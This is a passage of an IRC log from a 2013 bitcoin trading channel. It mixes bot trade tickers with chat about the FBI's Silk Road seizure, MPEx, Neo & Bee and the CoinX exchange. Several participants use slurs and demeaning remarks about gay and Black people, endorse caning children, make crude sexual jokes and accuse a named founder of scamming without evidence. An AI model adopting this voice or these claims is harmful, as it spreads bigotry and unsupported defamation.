BTCUSD last: 164.01, vol: 31857.02474 | Bitfinex BTCUSD last: 177.49, vol: 10766.02396314 | CampBX BTCUSD last: 170.74, vol: 1075.318944 | Volume-weighted last average: 174.521562617 Oct 25 18:38:04 <nubbins`> http://log.bitcoin-assets.com/?date=23-10-2013#357537 Oct 25 18:38:06 <ozbot> #bitcoin-assets log Oct 25 18:39:04 <assbot> [HAVELOCK] [AM1] 6 @ 0.800149 = 4.8009 BTC [-] {3} Oct 25 18:41:22 <mike_c> mpex options expired 16 hours ago, yes? do the 'T' and 'N' options roll over after the mpoe monthly statement is issued? Oct 25 18:44:09 <assbot> [HAVELOCK] [AM1] 11 @ 0.8 = 8.8 BTC [-] {2} Oct 25 18:44:36 <KRS-> no Oct 25 18:46:02 <mike_c> ok.. they roll over in random()*36 hours? Oct 25 18:57:02 <nubbins`> http://news.nationalpost.com/2013/10/24/after-seven-years-in-jail-canadas-man-with-no-name-may-be-ready-to-reveal-true-identity-and-regain-freedom/ Oct 25 18:57:04 <ozbot> After seven years in jail, Canada’s ‘Man With No Name’ may be ready to reveal true identity Oct 25 19:13:38 <assbot> [HAVELOCK] [HIM] 6 @ 0.0745 = 0.447 BTC [-] Oct 25 19:17:43 <deadweasel> mike_c: N's turn into T's, T's are expired. Oct 25 19:24:49 <assbot> [HAVELOCK] [AM100] 50 @ 0.0075091 = 0.3755 BTC [-] {2} Oct 25 19:25:50 <assbot> [HAVELOCK] [AM100] 50 @ 0.007509 = 0.3755 BTC [-] Oct 25 19:27:04 <mircea_popescu> mike_c not in random, at midnight gmt Oct 25 19:27:24 <mircea_popescu> (bout 7 hours or so) Oct 25 19:28:40 <mike_c> oh, i thought expiration was midnight Thursday before the last friday. not sure where i read that. thanks. Oct 25 19:41:05 <assbot> [MPEX] [S.MPOE] 4000 @ 0.00082471 = 3.2988 BTC [-] Oct 25 19:52:17 <assbot> [MPEX] [S.MPOE] 750 @ 0.00082471 = 0.6185 BTC [-] Oct 25 20:11:36 <assbot> [HAVELOCK] [AM1] 1 @ 0.84 BTC [+] Oct 25 20:12:37 <assbot> [HAVELOCK] [AM100] 15 @ 0.00788994 = 0.1183 BTC [+] Oct 25 20:25:51 <assbot> [HAVELOCK] [NEOBEE] 200 @ 0.00235983 = 0.472 BTC [+] {3} Oct 25 20:34:09 <dexX7> http://www.forbes.com/sites/andygreenberg/2013/10/25/fbi-says-its-seized-20-million-in-bitcoins-from-ross-ulbricht-alleged-owner-of-silk-road/ Oct 25 20:34:10 <ozbot> FBI Says It's Seized $28.5 Million In Bitcoins From Ross Ulbricht, Alleged Owner Of Silk Road - Forb Oct 25 20:36:46 <mircea_popescu> 100k ? Oct 25 20:36:53 <mircea_popescu> better than mining Oct 25 20:37:30 <dexX7> haha yea Oct 25 20:38:02 <assbot> [HAVELOCK] [AM100] 43 @ 0.00788994 = 0.3393 BTC [+] Oct 25 20:38:03 <dexX7> that's 180k confiscated coins now, if i'm not mistaken Oct 25 20:39:03 <assbot> [HAVELOCK] [AM100] 14 @ 0.00788994 = 0.1105 BTC [+] Oct 25 20:39:20 <mircea_popescu> An FBI official tells me that the bureau has located and seized a collection of 144,000 bitcoins, the largest seizure of that cryptocurrency ever, worth close to $28.5 million at current exchange rates. It believes that the stash belonged to Ross Ulbricht Oct 25 20:39:38 <mircea_popescu> ahem. so basically all future bitcoin incvome of the us will be reported as allegedly confiscated from this guy ? Oct 25 20:39:39 <mircea_popescu> nice plan. Oct 25 20:40:18 <dexX7> it probably more like "we found the privkey on his machine, so it's his drug money" Oct 25 20:41:45 <VanCleef> invest in lube Oct 25 20:41:50 <VanCleef> we're all going to need it for jail Oct 25 20:42:06 <assbot> [HAVELOCK] [AM100] 44 @ 0.00788994 = 0.3472 BTC [+] Oct 25 20:42:22 <dexX7> the pattern is strange.. "take a wallet with > 3k coins, send 324 to 'dpr seized wallet', and repeat this step with the change" Oct 25 20:51:15 <assbot> [HAVELOCK] [AM1] 1 @ 0.8 BTC [-] Oct 25 20:55:19 <assbot> [HAVELOCK] [AM1] 4 @ 0.785 = 3.14 BTC [-] {2} Oct 25 20:57:21 <assbot> [HAVELOCK] [NEOBEE] 1697 @ 0.00209541 = 3.5559 BTC [-] {7} Oct 25 20:58:22 <assbot> [HAVELOCK] [NEOBEE] 525 @ 0.00209024 = 1.0974 BTC [-] {2} Oct 25 20:58:23 <assbot> [HAVELOCK] [AM1] 4 @ 0.75002499 = 3.0001 BTC [-] {4} Oct 25 20:59:23 <assbot> [HAVELOCK] [AM1] 6 @ 0.79768332 = 4.7861 BTC [+] {4} Oct 25 20:59:24 <assbot> [HAVELOCK] [SMG] 21000 @ 0.00014022 = 2.9446 BTC [-] {7} Oct 25 21:01:25 <assbot> [HAVELOCK] [AM100] 74 @ 0.00788995 = 0.5839 BTC [+] Oct 25 21:11:35 <assbot> [HAVELOCK] [AM1] 59 @ 0.72797965 = 42.9508 BTC [-] {9} Oct 25 21:21:45 <assbot> [HAVELOCK] [AM100] 46 @ 0.00750706 = 0.3453 BTC [-] {3} Oct 25 21:22:46 <assbot> [HAVELOCK] [NEOBEE] 2000 @ 0.00236519 = 4.7304 BTC [+] {6} Oct 25 21:22:47 <assbot> [HAVELOCK] [SMG] 5944 @ 0.0001401 = 0.8328 BTC [-] Oct 25 21:30:54 <assbot> [HAVELOCK] [AM100] 45 @ 0.0078 = 0.351 BTC [+] Oct 25 21:52:15 <assbot> [HAVELOCK] [NEOBEE] 6250 @ 0.00238832 = 14.927 BTC [+] {5} Oct 25 22:16:39 <assbot> [HAVELOCK] [CFIG] 82 @ 0.1418962 = 11.6355 BTC [+] {8} Oct 25 22:17:40 <assbot> [HAVELOCK] [CFIG] 18 @ 0.14462222 = 2.6032 BTC [+] {2} Oct 25 22:19:42 <assbot> [HAVELOCK] [CFIG] 700 @ 0.14868269 = 104.0779 BTC [+] {4} Oct 25 22:20:43 <assbot> [HAVELOCK] [CFIG] 23 @ 0.15017391 = 3.454 BTC [+] {3} Oct 25 22:24:47 <assbot> [HAVELOCK] [CFIG] 2 @ 0.2237 = 0.4474 BTC [+] {2} Oct 25 22:30:07 <lewicki> woah Oct 25 22:30:10 <lewicki> lots of buying on gox Oct 25 22:33:56 <assbot> [HAVELOCK] [AM1] 1 @ 0.7315 BTC [+] Oct 25 22:43:06 <assbot> [HAVELOCK] [AM100] 500 @ 0.00726781 = 3.6339 BTC [-] {6} Oct 25 22:48:11 <kleeck> ;;seen yeahyeah Oct 25 22:48:12 <gribble> yeahyeah was last seen in #bitcoin-assets 6 days, 5 hours, 55 minutes, and 39 seconds ago: <yeahyeah> yes Oct 25 22:48:14 <kleeck> RIP Oct 25 22:52:03 <Rulother> RIP Oct 25 22:57:34 <benkay> is anyone charting assets listed on MPEx? Oct 25 22:58:13 <benkay> stretching back further than a month... Oct 25 22:58:44 <kleeck> Cashing out of Am dexX7 ? Oct 25 22:59:03 <dexX7> benkay: www.coinflow.co Oct 25 23:00:56 <dexX7> kleeck: yes. now that the shareprice will rise back to a few btc, i think now is a good time ;) Oct 25 23:01:13 <kleeck> :) Oct 25 23:01:18 <kleeck> Of course, of course... Oct 25 23:01:26 <dexX7> *may :x Oct 25 23:05:28 <assbot> [HAVELOCK] [AM100] 136 @ 0.00725 = 0.986 BTC [-] {3} Oct 25 23:06:29 <assbot> [HAVELOCK] [AM100] 59 @ 0.00722001 = 0.426 BTC [-] {3} Oct 25 23:06:33 <mircea_popescu> benkay http://live.coinbr.com/?mpsic=S.MPOE Oct 25 23:07:08 <benkay> mircea_popescu: that last one only has a month of history. Oct 25 23:07:24 <mircea_popescu> i thought it also had a year option Oct 25 23:08:50 <benkay> i see none such Oct 25 23:08:58 <mircea_popescu> hm Oct 25 23:09:32 <assbot> [MPEX] [S.MPOE] 1551 @ 0.00082471 = 1.2791 BTC [-] Oct 25 23:09:32 <assbot> [HAVELOCK] [B] [XBOND] 366 @ 0.00114799 = 0.4202 BTC [+] Oct 25 23:09:43 <benkay> coinflow has all data - thanks dexX7 Oct 25 23:10:00 <dexX7> np Oct 25 23:10:49 <benkay> you may want to take down the link to btctc dexX7 Oct 25 23:12:01 <dexX7> you mean in the thread? yeah.. i think i should replace the "this will be updated soon" announcement with the actual update rather sooner than later Oct 25 23:14:01 <benkay> talking about the link in the "research" dropdown Oct 25 23:14:14 <dexX7> ???? Oct 25 23:14:18 <dexX7> ah Oct 25 23:14:19 <dexX7> nono Oct 25 23:14:22 <dexX7> i'm not the admin of coinflow Oct 25 23:14:35 <benkay> my mistake Oct 25 23:14:37 <assbot> [HAVELOCK] [B] [XBOND] 420 @ 0.00113033 = 0.4747 BTC [-] {5} Oct 25 23:15:38 <assbot> [HAVELOCK] [AM100] 39 @ 0.0075 = 0.2925 BTC [+] Oct 25 23:26:49 <assbot> [HAVELOCK] [AM100] 18 @ 0.007789 = 0.1402 BTC [-] Oct 25 23:32:54 <assbot> [HAVELOCK] [AM1] 1 @ 0.7795 BTC [+] Oct 25 23:41:28 <ThickAsThieves> https://bitcointalk.org/index.php?topic=289730.msg3411869#msg3411869 Oct 25 23:41:29 <ozbot> [IPVO] [Multiple Exchanges] Neo & Bee - LMB Holdings Oct 25 23:41:38 <ThickAsThieves> Official Neo Updates, Oct. 25, 2013 Oct 25 23:42:14 <dexX7> YES :D: Oct 25 23:51:13 <assbot> [HAVELOCK] [NEOBEE] 193 @ 0.00244999 = 0.4728 BTC [+] Oct 26 00:02:24 <assbot> [HAVELOCK] [AM100] 50 @ 0.00769979 = 0.385 BTC [-] Oct 26 00:03:25 <assbot> [HAVELOCK] [NEOBEE] 402 @ 0.00245 = 0.9849 BTC [+] {3} Oct 26 00:06:28 <assbot> [HAVELOCK] [NEOBEE] 154 @ 0.00246015 = 0.3789 BTC [+] {2} Oct 26 00:07:30 <assbot> [HAVELOCK] [NEOBEE] 275 @ 0.0025 = 0.6875 BTC [+] Oct 26 00:08:17 <mircea_popescu> http://thecable.foreignpolicy.com/posts/2013/10/24/exclusive_germany_brazil_turn_to_un_to_restrain_american_spies Oct 26 00:08:18 <ozbot> Exclusive: Germany, Brazil Turn to U.N. to Restrain American Spies | The Cable Oct 26 00:08:24 <mircea_popescu> the un general assembly is going to be a riot. Oct 26 00:08:37 <mircea_popescu> obama takes off shoe, slams it against table ? Oct 26 00:09:12 <jurov> http://www.youtube.com/watch?v=6oBZaht3nNo Oct 26 00:09:12 <ozbot> DentiDrill - de eerste tandartsboor voor thuisgebruik - YouTube Oct 26 00:09:22 <jurov> mircea_popescu: citizen dentistry is here! Oct 26 00:09:29 <asciilifeform> nah, he'll just gather a group of flunkies in his office and shout 'nein nein nein nein nein!' Oct 26 00:09:41 <mircea_popescu> asciilifeform NEVER AGAIN YOU HEAR!!! WHAT THE FUCK WAS THAT~!!!!1 Oct 26 00:10:17 <nubbins`> !!! Oct 26 00:10:27 <mircea_popescu> jurov yeah, those two really look like they can't afford the dentist visit Oct 26 00:10:32 <assbot> [HAVELOCK] [AM100] 50 @ 0.00769979 = 0.385 BTC [-] {2} Oct 26 00:10:33 <assbot> [HAVELOCK] [HIM] 4 @ 0.07459 = 0.2984 BTC [+] Oct 26 00:11:01 <jurov> that's homeschooling, don't need no filthy teachers or doctors Oct 26 00:11:42 <mircea_popescu> seems a broken analogy. Oct 26 00:11:59 <mircea_popescu> schooling would appear to be more akin cooking than dentistry. Oct 26 00:12:34 <assbot> [HAVELOCK] [B] [XBOND] 210 @ 0.00114799 = 0.2411 BTC [+] Oct 26 00:15:08 <mircea_popescu> asciilifeform here you go : "The worst case scenario I think would be having our European allies saying they will no longer share signals intelligence because of a concern that our SigInt is being derived from mechanisms that violate their privacy rules," said Ray Kimball, an army strategist with policy experience on European issues. Oct 26 00:17:40 <assbot> [HAVELOCK] [AM1] 1 @ 0.77 BTC [-] Oct 26 00:17:49 <jurov> Oh my! Oracle powered exchange. Oct 26 00:20:22 <jurov> and all dat swag...mircea, nobody will take you seriously now. you absolutely must announce microsoft sql server or google partnership. Oct 26 00:21:02 <mircea_popescu> i don't know anyone there i'd want to partner with tho. Oct 26 00:21:06 <mircea_popescu> sucks to be me i guess. Oct 26 00:21:12 <jurov> and don't forget MPEx-themed condoms Oct 26 00:23:23 <mircea_popescu> i can't do that, the neoreactionaries would hate me because i am helping the jewish-african plot to subvert white fecundity. Oct 26 00:23:42 <pankkake> I want the pankkake-themed butt plug http://i.imgur.com/xOftDYp.png Oct 26 00:23:44 <mircea_popescu> http://www.vdare.com/articles/diversity-boot-camp-closed-at-the-university-of-delaware-but-big-brother-is-still-going-str < not a bad read. Oct 26 00:24:46 <assbot> [HAVELOCK] [VTX] 1 @ 0.33999999 BTC [-] Oct 26 00:31:18 <dub> can't read it because its layed out like the writer has sever ADHD Oct 26 00:31:59 <jurov> it's an African-American woman of biracial West Indian and Russian-Jewish heritage Oct 26 00:32:12 <dub> but at a glimpse, angry old man syndrome Oct 26 00:32:23 <mircea_popescu> dub what's that ? Oct 26 00:33:03 <dub> ADHD? its another name for asperges Oct 26 00:33:35 <mircea_popescu> angry old man syndrome. Oct 26 00:33:41 <pankkake> curmudgeon Oct 26 00:34:40 <mircea_popescu> "Americans don't want to study hard things. That's for foreigners. Fluff courses like these ethnic-studies timewasters—that's what people want. Unless a university is 'anchored' by a big department teaching real subjects—a medical or engineering school—the drift is all that way." Oct 26 00:34:42 <dub> it just looks like a 'in my day' rant Oct 26 00:34:56 <mircea_popescu> no, seriously, it's perhaps the best discussion of us academia i've read. ever. Oct 26 00:36:12 <mircea_popescu> it does strangely veer into how aids is all about faggots and evil black people in africa however. Oct 26 00:36:16 <mircea_popescu> weird how that works out. Oct 26 00:36:55 <dexX7> https://blockchain.info/address/1FfmbHfnpaZjKFvyi1okTjJJusN455paPH all those 324 btc tx ... http://www.pachd.com/free-images/technology-images/phone-dial-pad-01.jpg :D Oct 26 00:36:56 <ozbot> Bitcoin Address 1FfmbHfnpaZjKFvyi1okTjJJusN455paPH Oct 26 00:38:14 <mircea_popescu> dexX7 lmao someone in the fbi seriously sat over a console coding up a way to send bitcoins in 324 batches ? Oct 26 00:38:21 <mircea_popescu> cute. Oct 26 00:38:26 <dexX7> yes Oct 26 00:38:46 <dub> I suspect if they'd been teachign empathy and inclusivety in 1852 the world would be a lot nicer place Oct 26 00:39:09 <dub> inb4 blawgrage Oct 26 00:39:18 <mircea_popescu> dub yeah, i'd be speaking chinese and you lot wouldn't be on the internet. Oct 26 00:39:19 <dexX7> if you take a look at a phonepad and type 324 it will include the chars to form FBI Oct 26 00:39:56 <dub> dexX7: fucken chemtrails Oct 26 00:40:13 <dexX7> chemtrails are bad, yes :p Oct 26 00:40:21 <mircea_popescu> dexX7 i'm aware. i just thought it's marginally ridiculous to be that desperate to impress bitcoin forum/reddit. Oct 26 00:41:00 <dexX7> haha yea Oct 26 00:41:40 <mircea_popescu> but hey, whatever. sucks being a govt agency, if you do shit like this you're too eager, if you don't you're dumb, there's no way out. Oct 26 00:42:20 <dexX7> there is still the theory that the whole bust was manufactured Oct 26 00:42:39 <mircea_popescu> you mean presley's or hoffa's ? Oct 26 00:43:08 <dexX7> i'm looking for the post, sec Oct 26 00:43:28 <mircea_popescu> you can't be too young to have missed those references ?! Oct 26 00:43:45 <dexX7> :D Oct 26 00:43:53 <dexX7> i don't know this reference Oct 26 00:44:38 <mircea_popescu> well the theory is that elvis isn't really dead, just hiding, and then hoffa (teamsters union) was dissapeared mysteriously Oct 26 00:44:58 <mircea_popescu> so obliquely, "yeah, you'll never get rid of the theory X thing is manufactured" Oct 26 00:45:42 <dexX7> ah Oct 26 00:46:26 <kakobrekla> you should say tupac or something, for the kids Oct 26 00:46:34 <mircea_popescu> dr dre's dead Oct 26 00:46:37 <mircea_popescu> he's locked in ma basement Oct 26 00:47:09 <assbot> [HAVELOCK] [B] [XBOND] 103 @ 0.00113 = 0.1164 BTC [-] {2} Oct 26 00:50:12 <assbot> [HAVELOCK] [NEOBEE] 3500 @ 0.0025 = 8.75 BTC [+] Oct 26 00:50:56 <mod6> mircea_popescu: haha Oct 26 00:52:41 <dexX7> well anyway. i don't find it, but it was on reddit. probably deleted by the mods, because it was true. :p Oct 26 00:52:48 <dexX7> jk Oct 26 00:53:49 <dexX7> http://www.reddit.com/r/SilkroadUNcensored/comments/1p0ogt/time_to_let_the_cat_out_of_the_hat/ Oct 26 00:55:17 <assbot> [HAVELOCK] [NEOBEE] 500 @ 0.0025 = 1.25 BTC [+] Oct 26 00:56:36 <mircea_popescu> lol it got deleted ? Oct 26 00:56:52 <mircea_popescu> i remember reading it yest or w/e. coupla pages of the usual fare. Oct 26 00:57:30 <kakobrekla> https://www.coinx.com/ Oct 26 00:57:30 <ozbot> Home Page - CoinX Trading Platform Oct 26 00:58:20 <assbot> [HAVELOCK] [NEOBEE] 4000 @ 0.0025 = 10 BTC [+] Oct 26 00:58:56 <dexX7> looks like another hobby project Oct 26 00:59:22 <kakobrekla> http://finance.yahoo.com/news/coinx-bitcoin-exchange-actually-takes-142123182.html Oct 26 00:59:23 <ozbot> CoinX Is A New Bitcoin Exchange That Actually Takes Financial Compliance Seriously - Yahoo Finance Oct 26 00:59:24 <mircea_popescu> allthese pictures of handshakes... Oct 26 00:59:33 <dexX7> uh lol Oct 26 00:59:56 <kakobrekla> Operating out of Atlanta, Ga., CoinX is all about turning conventional money into the anonymous digital currency called Bitcoin, and Bitcoin into conventional money. It's also the first to actually take financial compliance seriously. Oct 26 01:00:43 <kakobrekla> CoinX and the NYSE are so closely linked that the NYSE logo appears on some CoinX marketing. Oct 26 01:00:43 <kakobrekla> lol Oct 26 01:01:10 <mircea_popescu> uh what ? Oct 26 01:02:21 <mircea_popescu> Megan is the founder and CEO of a successful Internet security and networking company that provides service to a number of Fortune 1000 companies. Oct 26 01:02:24 <assbot> [HAVELOCK] [NEOBEE] 4512 @ 0.00211056 = 9.5228 BTC [-] {21} Oct 26 01:02:55 <kakobrekla> i think theres a reason why over 50% of fx trades is in europe Oct 26 01:02:57 <mircea_popescu> who apparently had some startup in atlanta called seegee Oct 26 01:02:57 <dexX7> http://www.youtube.com/watch?v=xJBFaaYGmqQ Oct 26 01:02:58 <ozbot> Testimonial - Megan Burton of CoinX - YouTube Oct 26 01:03:06 <dexX7> http://www.seegee.com/about-us/management-team.html Oct 26 01:03:07 <ozbot> IT Management Team - SeeGee Technologies Oct 26 01:03:24 <assbot> [HAVELOCK] [NEOBEE] 488 @ 0.002 = 0.976 BTC [-] Oct 26 01:03:25 <assbot> [HAVELOCK] [AM1] 1 @ 0.78449892 BTC [+] Oct 26 01:03:44 <mircea_popescu> so okay, burned through the funding, moved over to bitcoin. Oct 26 01:04:35 <mircea_popescu> i wonder how many of the retarded vcs (defined as any vc who's not been talking to me, no matter what their mommy told them about how smart they are) realise that the new mo of the start-up scamscene is, get a "seed round", turn it to bitcoin, walk away with the wallet a year later. Oct 26 01:04:48 <kakobrekla> >>"no doesnt mean no, means not right now" Oct 26 01:05:26 <assbot> [HAVELOCK] [NEOBEE] 100 @ 0.00249995 = 0.25 BTC [+] Oct 26 01:05:56 <kakobrekla> >CoinX is licensed in more than half of US states. Oct 26 01:05:59 <kakobrekla> that beats kraken? Oct 26 01:07:02 <mircea_popescu> until they show proof to these claims, btcjam is licensed on the pacific ocean floor. Oct 26 01:07:16 <mircea_popescu> and tux has a license from a kappa he once met on a river bank. Oct 26 01:08:28 <jurov> we have somalian license Oct 26 01:09:45 <dexX7> kakobrekla: was it you who "tested" btc.cx? what was your conclusion? Oct 26 01:09:54 <dexX7> www.btc.sx Oct 26 01:10:02 <kakobrekla> very poorly coded Oct 26 01:10:12 <pankkake> .sx and not related to sex :/ Oct 26 01:10:19 <jurov> .sux Oct 26 01:10:27 <kakobrekla> ^^ Oct 26 01:10:37 <dexX7> xD Oct 26 01:10:51 <kakobrekla> but hey im a sladerous soul Oct 26 01:10:54 <kakobrekla> so dont listen to me. Oct 26 01:11:16 <jurov> my slovenly slanderous somalian Oct 26 01:11:38 <jurov> *slovenly slanderous somalian soul Oct 26 01:11:43 <pankkake> somali* Oct 26 01:11:52 <jurov> oh sry Oct 26 01:12:07 <kakobrekla> twice as worse as the SS Oct 26 01:15:41 <mircea_popescu> <jurov> my slovenly slanderous somalian <<< ahaha best in class. Oct 26 01:18:20 <ThickAsThieves> <jurov> Oh my! Oracle powered exchange. <<< if you're referring to Neo, there is no Oracle-powered exchange or such. Oracle is for Neo and Bee's previously announced business services. To my knowledge, they are merely exploring the idea of doing the stock exchange down the road, and have no software plans in that regard. Oct 26 01:19:20 <kakobrekla> yeah jurov whats up with the slander Oct 26 01:19:31 <mircea_popescu> ThickAsThieves you know, it's a little strange you're doing their announcements for them. you're starting like a pr practice or what is it ? Oct 26 01:19:56 <jurov> what slander? towards oracle? cuz i was a DBA. Oct 26 01:19:57 <mircea_popescu> you actually signing off on them, if they fail to deliver whatever people get to pursue you ? Oct 26 01:19:58 <ThickAsThieves> more like transfer agent / asset manager Oct 26 01:20:32 <mircea_popescu> it'd prolly be a good idea to clearly specify the relationship, preferably by a published contract. otherwise you'll have trouble managing expectations down the road. Oct 26 01:20:50 <ThickAsThieves> all claims are those of Neo's, not TATI Oct 26 01:20:51 <jurov> in any case i doubt they'll choose something other for exchange, having the expertise in-house Oct 26 01:21:03 <ThickAsThieves> this relationship is explained in the prospectus Oct 26 01:21:11 <ThickAsThieves> whether sufficient, i cant say Oct 26 01:22:32 <mircea_popescu> well, the fact remains most people that managed to ruin their reputation to date did so by agreeing to front for some third party new to btc that then went tits up. Oct 26 01:24:18 <jurov> ThickAsThieves: no hard feelings... aside for my personal oracle dba misadventure, i found it funny to publish photos of swag like there Oct 26 01:24:56 <ThickAsThieves> I understand. We went through several measures to manage that concern. Surely we could have done more, and we can never prevent outright failure of the business, but we do have a contract with Neo directly that defines our role as well. Oct 26 01:25:28 <jurov> wow, you got managerspeak bug :) Oct 26 01:25:29 <ThickAsThieves> i know nothing of Oracle vs this or that. Honestly my personal impression of Oracle is negative Oct 26 01:25:40 <mircea_popescu> just make sure people know about the definitions so you have what to fall back on in case. Oct 26 01:25:46 <mircea_popescu> financial management is contingency management after all. Oct 26 01:26:17 <dexX7> how many people are behind ThickAsThieves? Oct 26 01:26:22 <ThickAsThieves> Understood, contigency planning seems to be most of my time these days... Oct 26 01:26:45 <ThickAsThieves> haha, well ThickAsThieves is just a handle for me personally Oct 26 01:26:49 <mircea_popescu> jurov oracle is pretty good if you run a large non it corp, because you can just call them to fix your shit. it's non trivial to keep on staff it people able to handle large-ish server farms. Oct 26 01:27:01 <ThickAsThieves> TATI the entity is 2 partners and a few software guys Oct 26 01:27:05 <dexX7> ah okay :) Oct 26 01:27:34 <mircea_popescu> leaving aside the horrible obamacare website fail which probably everyone heard of, check out say this : Oct 26 01:27:34 <mircea_popescu> http://ace.mu.nu/archives/334783.php Oct 26 01:27:57 <mircea_popescu> (romney's campaign fail) Oct 26 01:28:49 <jurov> so neo/bee won't have in house dba? oracle support, especially urgent one, is expensive Oct 26 01:29:05 <ThickAsThieves> i know their oracle setup wasnt cheap Oct 26 01:29:09 <jurov> i' not sure cyprus market can easily support sich Oct 26 01:29:14 <jurov> *such Oct 26 01:29:24 <mircea_popescu> maybe they already have it for something else and are just freeriding this on that. Oct 26 01:29:40 <mircea_popescu> inhouse dba is expensive too, for that matter. Oct 26 01:29:49 <jurov> no i understood it as they creating new team from scratch Oct 26 01:30:06 <mircea_popescu> ya well. Oct 26 01:30:16 <jurov> "Leon has a long-standing relationship with Danny Brewster, trust has been established over many years." or from scrotch Oct 26 01:30:24 <ThickAsThieves> they have a software consulting co that is handling it all i think, as a long term partner Oct 26 01:30:39 <ThickAsThieves> i met two of the guys Oct 26 01:30:53 <ThickAsThieves> they are hiring for the project, yes Oct 26 01:32:44 <jurov> whatever, i just want to say whole setup looks too excessive. Oct 26 01:33:06 <dexX7> is there already an eta for the exchange or is it more an idea? Oct 26 01:33:20 <ThickAsThieves> excessive to run a payment network and bank chains? Oct 26 01:33:28 <ThickAsThieves> i have no idea Oct 26 01:33:41 <ThickAsThieves> the exchange has no timeline Oct 26 01:33:50 <jurov> i mean the office space, furniture, oracle licenses, etc. Oct 26 01:34:40 <ThickAsThieves> i guess time will tell, i have no way to argue for or against the frigality Oct 26 01:34:44 <ThickAsThieves> frugality Oct 26 01:35:22 <ThickAsThieves> probably isnt one answer anyway Oct 26 01:36:40 <jurov> imho these are suitable for established bank, not as a first thing after they got investment Oct 26 01:36:59 <mircea_popescu> jurov lol they got one crampy conference room and some office space, give teh people a break. Oct 26 01:37:05 <ThickAsThieves> is your opinion from experience? Oct 26 01:37:08 <mircea_popescu> i've seen MUCH worse in ny and sf. Oct 26 01:37:21 <pankkake> my experience is that oracle sucks balls :p Oct 26 01:37:39 <pankkake> otherwise the thing looks ok. actually, I don't really undertand why they have to communicate about oracle Oct 26 01:37:53 <dexX7> mircea_popescu: you must have missed that http://i.imgur.com/U1lr806.png ;) Oct 26 01:37:57 <ThickAsThieves> the pictures do make the office space look smaller than it is Oct 26 01:37:59 <jurov> My experience is that in slovakia (similarly sized marked like cyprus) such spaces are few and far between. Oct 26 01:38:13 <ThickAsThieves> when i was there i was like oh, i thought it this was all much smaller Oct 26 01:38:14 <mircea_popescu> dexX7 that looks like a model :p Oct 26 01:38:30 <ThickAsThieves> the buidling exists Oct 26 01:38:38 <ThickAsThieves> and looks much like the rendering Oct 26 01:38:44 <ThickAsThieves> the signage isnt there yet Oct 26 01:38:52 <ThickAsThieves> they have the whole floor just above the sign Oct 26 01:38:53 <mircea_popescu> ThickAsThieves yeah pictures usually do. i know the first time i went on a set and saw the actual tits i was hmm... didn't think they're actually that big. Oct 26 01:38:59 <ThickAsThieves> and then one rretail unit below it Oct 26 01:39:08 <ThickAsThieves> haha Oct 26 01:39:13 <dexX7> the whole complex is used by them or did they just rent a floor? Oct 26 01:39:21 <dexX7> ah okaxy Oct 26 01:39:39 <ThickAsThieves> the top floor is their design agency Oct 26 01:39:39 <mircea_popescu> dexX7 the building is made from the caps of pens they use in filing their taxes Oct 26 01:39:49 <ThickAsThieves> the software agency is considering an office bnearby as well Oct 26 01:39:54 <mircea_popescu> it rests atop an artificial island created out of employee icecream tubs. Oct 26 01:40:15 <ThickAsThieves> mktg agency, i should say, not design Oct 26 01:40:27 <ThickAsThieves> of course they do design as well Oct 26 01:49:10 <assbot> [HAVELOCK] [LABCO] 500 @ 0.00048815 = 0.2441 BTC [-] {11} Oct 26 02:20:41 <assbot> [HAVELOCK] [B] [XBOND] 100 @ 0.0011478 = 0.1148 BTC [+] Oct 26 02:29:49 <assbot> [HAVELOCK] [NEOBEE] 127 @ 0.00249 = 0.3162 BTC [-] Oct 26 02:30:51 <assbot> [HAVELOCK] [NEOBEE] 369 @ 0.00249 = 0.9188 BTC [-] Oct 26 02:34:55 <assbot> [MPEX] [S.MPOE] 3650 @ 0.00082765 = 3.0209 BTC [+] {2} Oct 26 02:48:20 <nubbins`> <mircea_popescu> i can't do that, the neoreactionaries would hate me because i am helping the jewish-african plot to subvert white fecundity. Oct 26 02:48:39 <nubbins`> it's so rare that i see the word "fecund" used in conversation. great word Oct 26 02:48:57 <mircea_popescu> :p Oct 26 02:52:12 <assbot> [HAVELOCK] [AM1] 1 @ 0.77 BTC [-] Oct 26 02:53:58 <nubbins`> <dexX7> if you take a look at a phonepad and type 324 it will include the chars to form FBI Oct 26 02:54:02 <nubbins`> lel, a thousand times lel Oct 26 02:54:07 <nubbins`> (just catching up here) Oct 26 02:54:13 <dexX7> haha yeah Oct 26 02:54:15 <nubbins`> zine workshop was a bit of a shit show Oct 26 02:54:51 <mircea_popescu> crazy bitches ? Oct 26 02:56:20 <nubbins`> the workshop itself was great, everybody loved printing. but then i got stuck in the room for a "discussion" between this youth group and their project supervisors Oct 26 02:56:31 <nubbins`> where basically everyone argued for an hour Oct 26 02:56:57 <nubbins`> about their responsibilities Oct 26 02:57:30 <mircea_popescu> kids there don't get beaten enough. Oct 26 02:57:38 <nubbins`> well, that was one of the points that came up Oct 26 02:57:50 <nubbins`> it's 9 youths from canada and 9 from ghana Oct 26 02:58:03 <mircea_popescu> o wow. interesting idea Oct 26 02:58:13 <nubbins`> yeah. 3 months here, 3 months there Oct 26 02:59:04 <nubbins`> anyway, the issue arose because the ghanaians don't feel comfortable questioning "authority" figures, and the supervisors were explaining that here in canada if you don't understand why you're doing something, you ask, because you're trying to be a part of our culture Oct 26 02:59:19 <assbot> [HAVELOCK] [AM1] 1 @ 0.76 BTC [-] Oct 26 02:59:28 <nubbins`> then the point was raised that the canadians will also probably end up feeling uncomfortable in ghana because children are caned there Oct 26 03:00:00 <nubbins`> and the canadians were all "o" Oct 26 03:00:04 <mircea_popescu> ahahaha precious Oct 26 03:00:20 <assbot> [HAVELOCK] [AM1] 6 @ 0.75 = 4.5 BTC [-] {2} Oct 26 03:00:44 <mircea_popescu> somehow we must get this perfect middle where if you don't understand you ask but if you think you know better you stfu or get caned. Oct 26 03:01:04 <mircea_popescu> i'd totally move to that ghanada. Oct 26 03:01:09 <mircea_popescu> heck, even pay taxes. Oct 26 03:01:26 <nubbins`> ! Oct 26 03:01:37 <nubbins`> funny, "ghanada" is exactly what's written on the covers of the zines Oct 26 03:01:58 <nubbins`> you sure you're not a youth volunteer? Oct 26 03:02:53 <mircea_popescu> i'm just the nsa, that's all. Oct 26 03:03:12 <monkey`> that trashbag mircea popescu selling a new pump and dump? Oct 26 03:03:45 <kakobrekla> dis comming from labcoin investor? Oct 26 03:03:51 <monkey`> http://mpex.co/?mpsic=S.NSA Oct 26 03:04:05 <monkey`> fuck is this new garbage? what happend to his little online RPG Oct 26 03:04:41 <mircea_popescu> Jun 22 23:49:41 <ThickAsThieves> 